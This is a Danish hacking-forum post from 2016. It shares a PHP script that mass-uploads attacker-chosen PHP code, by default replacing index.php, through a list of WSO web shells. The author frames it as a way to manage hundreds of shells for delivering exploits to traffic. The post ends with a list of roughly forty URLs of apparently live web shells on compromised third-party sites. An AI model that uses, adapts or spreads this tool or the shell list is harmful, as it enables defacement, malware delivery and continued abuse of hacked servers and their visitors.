Shellsec

Shellsec > Udgivelser > Udgivelser > WSO Shell Uploader + gratis shells til test af scriptet.
Fuld version: WSO Shell Uploader + gratis shells til test af scriptet.
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.

Fantôme

10-10-2016, 21:54
Denne uploader er lavet specifikt for WSO shells, du kan masse upload en liste med shells, du specificere path til din wso shell.
Eksempel: http://dinside.dk/x.php

På samme server som du uploader dette script skal du lave en txt-fil som hedder kode.txt og i den indsætter du din PHP kode.
Din PHP kode i kode.txt vil blive lavet om til en PHP fil og så kan du mass upload din PHP fil til alle din shells.

Mixede den hurtigt sammen til når jeg selv håndtere store lister med 250-500 shells som jeg bruger som leverings sider eller som "clean pages" når man exploiter større mængder af traffik.
<?PHP

       if(isset($_POST['shells'])) {

            $list = explode(PHP_EOL, $_POST['shells']);



            foreach ($list as $val) {

                $ch = curl_init();

                curl_setopt($ch, CURLOPT_HEADER, 0);

                curl_setopt($ch, CURLOPT_VERBOSE, 0);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

                curl_setopt($ch, CURLOPT_URL, $val);

                curl_setopt($ch, CURLOPT_POST, true);

                $file = new CURLFile('kode.txt');

                $file->setPostFilename("index.php"); // ændre det til det som din ekstra side skal hedde eller lad den blive hvis formålet er at ændre index siden.

                $post = array('a' => "FilesMAn", 'c' => "", 'p1' => 'uploadFile', 'charset' => 'Windows-1251', 'f' => $file);

                $url = parse_url($val);

                curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

                curl_exec($ch);

                echo $url["host"] . " | fil er uploaded." . "<br>";

            }

        }



        echo '

        <h2>indsæt din shell liste</h2><br>

        <form method="POST">

        <textarea class="form-control" style="resize: vertical;" name="shells"></textarea><br>

        <button type="submit">Upload kode</button>

        </form>

        ';

?>

Her er en liste med nogle shells så man kan teste scriptet:
// denne liste er lidt ældre men nogle af dem virker fint, de er kode injektet så lad hver at besøge dem direkte, gå kun direkte til wso shells.



http://www.jsc.lt//tmp/wso.php

http://www.petrolguardian.com//tmp/wso.php

http://penyel.com.br/wso.php

http://www.nvc.com.cy/wso.php

http://nicoband.ru/wso.php

http://dupreedance.com//wso.php

http://en.torshin.ru/wso.php

http://www.engtest.net/wso.php

http://farmproducts.ru/wso.php

http://www.orderartwork.com/wso.php

http://www.citylog.com.ar/wso.php

http://goulis.gr/wso.php

http://cerawear.hu/wso.php

http://radonejskiy.ru/wso.php

http://stroipozhservis.ru/wso.php

http://ns1.bigday.com.hk/wso.php

http://dolchelecro.es/wso.php

http://korglobalservices.com/wso.php

http://allfile.ir/wso.php

http://mail.raulmarinho.com/wso.php

http://6october.info/wso.php

http://furg.se/wso.php

http://craigclearyconstructions.com/wso.php

http://www.bjchenyangjiaju.com/wso.php

http://www.aeongv.com/wso.php

http://ywzj.s602.xrea.com/wso.php

http://www.orchardcroft.ca/wso.php

http://www.88711.cn/wso.php

http://www.boiler123.com/wso.php

http://www.yunsbridal.cn/wso.php

http://officestoday.com/wso.php

http://chdup.com/wso.php

http://www.xuanwudd.com//wso.php

http://www.hcxk.net//wso.php

http://proresultsrealestate.com//wso.php

http://duniakereta.com//wso.php

http://rawbeets.com//wso.php

http://yorkshirecottageservices.co.uk//wso.php

http://en.sinengpower.com//wso.php

http://www.scmbxs.com//wso.php

http://www.valour.com.cn//wso.php

http://km888.com.cn/wso.php

http://www.hhszwh.com/wso.php
Shellsec > Udgivelser > Udgivelser > WSO Shell Uploader + gratis shells til test af scriptet.